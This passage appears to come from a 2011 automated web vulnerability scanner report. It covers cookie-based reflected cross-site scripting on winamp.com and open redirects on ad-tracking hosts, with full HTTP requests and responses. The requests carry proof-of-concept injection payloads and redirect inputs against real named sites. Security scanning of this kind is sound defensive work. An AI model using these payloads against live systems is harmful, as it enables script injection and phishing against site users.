Response
HTTP/1.1 200 OK Server: nginx/0.8.47 Date: Sun, 27 Feb 2011 02:18:22 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM" Content-Length: 1195
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6c8"-alert(1)-"2de3f40c518 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET / HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=USef6c8"-alert(1)-"2de3f40c518; s_pers=%20s_getnr%3D1298828698586-New%7C1361900698586%3B%20s_nrgvo%3DNew%7C1361900698588%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:15 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 71696
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="USef6c8"-alert(1)-"2de3f40c518";</script> ...[SNIP]...
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2bf"-alert(1)-"2712191debe was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /media-player/en HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://forums.winamp.com/login.php?do=login Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=USff2bf"-alert(1)-"2712191debe
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:44:57 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 46321
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="USff2bf"-alert(1)-"2712191debe";</script> ...[SNIP]...
The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db17"-alert(1)-"8eb02fd3069 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /skin/slick-redux/222084 HTTP/1.1 Host: www.winamp.com Proxy-Connection: keep-alive Referer: http://www.winamp.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=US4db17"-alert(1)-"8eb02fd3069; s_pers=%20s_getnr%3D1298828716004-New%7C1361900716004%3B%20s_nrgvo%3DNew%7C1361900716004%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-main%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/skin/slick-redux/222084%252526ot%25253DA%3B
Response
HTTP/1.1 200 OK Date: Sun, 27 Feb 2011 17:45:35 GMT Server: Apache-Coyote/1.1 Content-Type: text/html;charset=UTF-8 Content-Length: 34378
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h ...[SNIP]... <script type="text/javascript">Common.cntCode="US4db17"-alert(1)-"8eb02fd3069";</script> ...[SNIP]...
4. Open redirectionprevious There are 4 instances of this issue:
Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.
The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 was submitted in the ru parameter. This caused a redirection to the following URL:
GET /e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 HTTP/1.1 Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: na_tc=Y; OAX=rcHW801i4e0ADNVY
Response
HTTP/1.1 302 Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE" Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ X-Powered-By: Jigawatts Location: http://ad8127a790827d41e/a?http://ar.atwola.com/atd?it=7&iv=&rand=329065 Content-type: text/html Date: Sun, 27 Feb 2011 17:45:09 GMT Server: lighttpd/1.4.18 Content-Length: 1
4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225394
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a2fb1007d6302d504/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.a2fb1007d6302d504/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1225394?.a2fb1007d6302d504/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:34 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6jIGBUS%2Fl7SQNBlkGBgElBjDoBZM8l8GU4FcwxcsMpoTaIHI3IYLSEB4fmOJ6DKZEFcAU%2F18wJcwBpth4wRSHEZjiE4WoFAZTAschRj%2BD6HODWBsBESyGUCUQi943MDQAzdQHU7z%2FII4whZgSARbk8geyAZ6KFaA%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1mX%2Fv2w5zMDAqJfydpIGSIyBzVlWiYmBQZKB4T8jA8OX%2F3%2BAFJCRKrRpEyNMGMjQFNq0A5lvo8z1F5nPpBTvgqyfUWirJUj%2B%2F18on4FDpk4d3SKu1kkYQvUN6ELcCbvQhTgfL8dUtRNdiK%2FiLbqQrNlFdCEAUQFZHg%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:34 GMT; Path=/ Location: http://.a2fb1007d6302d504/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
4.3. http://tags.crwdcntrl.net/5/c=25/b=1225400 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
Low
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1225400
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .af7444b5c923be2c5/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.af7444b5c923be2c5/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1225400?.af7444b5c923be2c5/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:09 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdzay8DAqJfyVl%2BMQZaBQUCJAQx6wSTPZTAl%2BBVM8TKDKaE2iNxNiKA0hMcHprgegylRBTDF%2FxdMCXOAKTZeMMVhBKb4RCEqhcGUwHGI0c8g%2Btwg1kZABIshVAnEovcNDA1AM%2FXBFO8%2FiCNMIaZEgAW5%2FIFsACsbFRI%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1t7%2FX7bcYWBg1Et5qy8GEmNgc5ZVYmJgkGRg%2BM%2FIwPDl%2Fx8gBWToCW3awQgTBjJ0hDZtAvH%2F%2F4XwGZXiXZDVMypz%2FUVWzyi01RJFPQOHTJ06ukVcrZMwhOob0IW4E3ahC3E%2BXo6paie6EF%2FFW3QhWbOL6EIAQVhaNQ%3D%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:09 GMT; Path=/ Location: http://.af7444b5c923be2c5/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0
4.4. http://tags.crwdcntrl.net/5/c=25/b=1226041 [name of an arbitrarily supplied request parameter]previous
Summary
Severity:
Low
Confidence:
Certain
Host:
http://tags.crwdcntrl.net
Path:
/5/c=25/b=1226041
Issue detail
The name of an arbitrarily supplied request parameter is used to perform an HTTP redirect. The payload .a87ccf957205615f6/ was submitted in the name of an arbitrarily supplied request parameter. This caused a redirection to the following URL:
http://.a87ccf957205615f6/=1
The application attempts to prevent redirection attacks by prepending an absolute prefix to the user-supplied URL. However, this prefix does not include a trailing slash, so an attacker can add an additional domain name to point to a domain which they control.
Request
GET /5/c=25/b=1226041?.a87ccf957205615f6/=1 HTTP/1.1 Host: tags.crwdcntrl.net Proxy-Connection: keep-alive Referer: http://www.project-syndicate.org/series_metacategory/1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: aud=ABR4nGNgYGDwzdxymoGBUS%2FlldVZBlkGBgEl%2FV5OoHgvmOK5DKYEv4IpXmYwJdQGkbsJEZSG8PjAFNdjMMX%2FF0wJc4ApNl4wxWEEETRjAAE%2BUTBP4DhEsBosKPQMot0NYm0ExL5iCFUCseg9WKWwPpji%2FQdxhCnEMIgGLn8gBQDbtibF; cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2FmltP%2Fv2ydx8DAqJfyyuosSIyBzVlWiYmBQfJC8X9GBoYvDAxACshnbGDgUIp3gQsBGYxKSTOhfLA8s9BWS0aYThBfKd4LWZ5RaNMOsHweRJ6RgUOmTh3dLq7WSRhC9Q3oQpyPl6MLcSfswhTaiS7EV%2FEWXUjW7CK6EAAHWlQ7; OAID=6f898f9e37a5ffbfb8f8475e2a918987
Response
HTTP/1.1 302 Moved Temporarily Date: Sun, 27 Feb 2011 02:23:36 GMT Server: Apache/2.2.8 (CentOS) X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5 Cache-Control: no-cache Expires: 0 Pragma: no-cache P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV Set-Cookie: aud=ABR4nGNgYGDwzdy6goGBUS%2Fl7cx3DLIMDAJKDGDQCyZ5LoMpwa9gipcZTAm1QeRuQgSlITw%2BMMX1GEyJKoAp%2Fr9gSpgDTLHxgikOIzDFJwpRKQymBI5DjH4G0ecGsTYCIlgMoUogFr1vYGgAmqkPpnj%2FQRxhCjElAizI5Q9kAwBFQhZv; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Set-Cookie: cc=ACB4nGNQMEuzsLRIs0w1Nk80TUtLSkuySLMwMTdNNUq0NATKmDMAgW%2Fm1hX%2Fv2w5yMDAqJfyduY7kBgDm7OsEhMDgyQDw39GBoYv%2F%2F8AKSBjntBWS0aYMJChI7RpBzLfRmjTJmS%2BhTLXX2Q%2Bs1K8C7J5jAwcMnXq6BZxtU7CEKpvQBfiTtiFLsT5eDmmqp3oQnwVb9GFZM0uogsBAAadWGM%3D; Domain=.crwdcntrl.net; Expires=Thu, 24-Nov-2011 02:23:36 GMT; Path=/ Location: http://.a87ccf957205615f6/=1 Vary: Accept-Encoding Connection: close Content-Type: text/plain; charset=UTF-8 Content-Length: 0